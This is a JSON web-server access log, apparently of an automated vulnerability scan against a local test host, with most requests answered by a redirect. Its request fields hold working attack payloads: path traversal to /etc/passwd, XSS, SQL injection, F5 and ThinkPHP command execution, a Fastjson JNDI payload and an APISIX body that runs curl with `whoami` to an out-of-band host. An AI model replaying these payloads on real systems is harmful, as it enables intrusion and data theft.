+{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.332","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wps/portal HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.291","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /sws/index.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.260","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /libs/dam/merge/metadata.html?path=/etc&.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.094","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"frashnum=&action=login&Frm_Logintoken=1&Username=CUAdmin&Password=CUAdmin&Username=&Password=","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /cu.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.247","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webEdition/showTempFile.php?file=../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /static/img/custom_icons/favicon.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.738","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"system.listMethods","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /xmlrpc.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0A28fHqTZ7GSZPW9U0hevHrqymn1u\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22passconf\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0ATesting1@\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22email\x22\x0D\x0A\x0D\x0Atest@28fHqTZ7GSZPW9U0hevHrqymn1u.tld\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22editid\x22\x0D\x0A\x0D\x0A\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22add\x22\x0D\x0A\x0D\x0Aadd\x0D\x0A--01b28e152ee044338224bf647275f8eb\x0D\x0AContent-Disposition: form-data; name=\x22ulevelid\x22\x0D\x0A\x0D\x0A9\x0D\x0A--01b28e152ee044338224bf647275f8eb--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /lib/crud/userprocess.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.915","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /web.config HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.269","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/26 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.292","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.351","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.311","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.277","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.361","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?wptouch_switch=desktop&redirect=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.356","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22com.sun.rowset.JdbcRowSetImpl\x22,\x0D\x0A \x22dataSourceName\x22:\x22rmi://c9oms3gsmpve1ijt0mc04a7pbri687e3h.oast.live/Exploit\x22,\x0D\x0A \x22autoCommit\x22:true\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.358","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/defa-online-image-protector/redirect.php?r=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.316","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.319","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ////example.com@/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.045","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wt3/forceSave.php?file=/etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.436","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"{\x0D\x0A \x22headers\x22:{\x0D\x0A \x22X-Real-IP\x22:\x22127.0.0.1\x22,\x0D\x0A \x22Content-Type\x22:\x22application/json\x22\x0D\x0A },\x0D\x0A \x22timeout\x22:1500,\x0D\x0A \x22pipeline\x22:[\x0D\x0A {\x0D\x0A \x22method\x22:\x22PUT\x22,\x0D\x0A \x22path\x22:\x22/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\x22,\x0D\x0A \x22body\x22:\x22{\x5Cr\x5Cn \x5C\x22name\x5C\x22: \x5C\x22test\x5C\x22, \x5C\x22method\x5C\x22: [\x5C\x22GET\x5C\x22],\x5Cr\x5Cn \x5C\x22uri\x5C\x22: \x5C\x22/api/28fHqOOZdNSrUzhdIQ1S2igjepa\x5C\x22,\x5Cr\x5Cn \x5C\x22upstream\x5C\x22:{\x5C\x22type\x5C\x22:\x5C\x22roundrobin\x5C\x22,\x5C\x22nodes\x5C\x22:{\x5C\x22httpbin.org:80\x5C\x22:1}}\x5Cr\x5Cn,\x5Cr\x5Cn\x5C\x22filter_func\x5C\x22: \x5C\x22function(vars) os.execute('curl https://c9oms3gsmpve1ijt0mc0k538kpznt5uwa.oast.live/`whoami`'); return true end\x5C\x22}\x22\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /apisix/batch-requests HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.355","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /apply.cgi HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.304","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.257","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"appno= 1 union SELECT 98989*443131,1&editor=cn&site=web","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.281","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /openam/UI/Login HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.708","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.369","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-----------------------------253855577425106594691130420583\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22../../../../../tmp/passwd9\x22\x0D\x0AContent-Type: application/json\x0D\x0A\x0D\x0AMyPasswdNewData->/api/tomcat\x0D\x0A\x0D\x0A-----------------------------253855577425106594691130420583--\x0D\x0A","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /upload HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.267","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.422","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.268","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/27 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.348","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ////http://127.0.0.1example.com/%2f%2e%2e HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /?{alert(1)} HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.286","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.ico HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.387","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.344","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"-","request":"GET /./../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /docpicker/internal_proxy/http/example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.338","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:55 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/28fHqOOZdNSrUzhdIQ1S2igjepa HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.339","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.246","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"s=phpinfo()&_method=__construct&filter=assert","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /?s=index/index/index HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.248","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"sidefunc=update&syear=111'","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /Side.php HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.301","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/updraftplus/includes/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.326","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /versa/login.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.327","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.253","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /api/v4/users/28 HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.270","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"POST /v1/graph HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.976","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.276","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /PolicyMgmt/policyDetailsCard.do?poID=19&typeID=3&prodID=%27%22%3E%3Csvg%2fonload%3dalert(document.domain)%3E HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.272","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"1.122","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.347","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /.json?FNZ.html HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.247","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /schema HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.710","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 +0000","request_body":"-","remote_addr":"172.24.0.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/prostore/go.php?https://example.com/ HTTP/1.1","status":"308","body_bytes_sents":"171","req_time":"0.271","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "03/May/2022:18:02:56 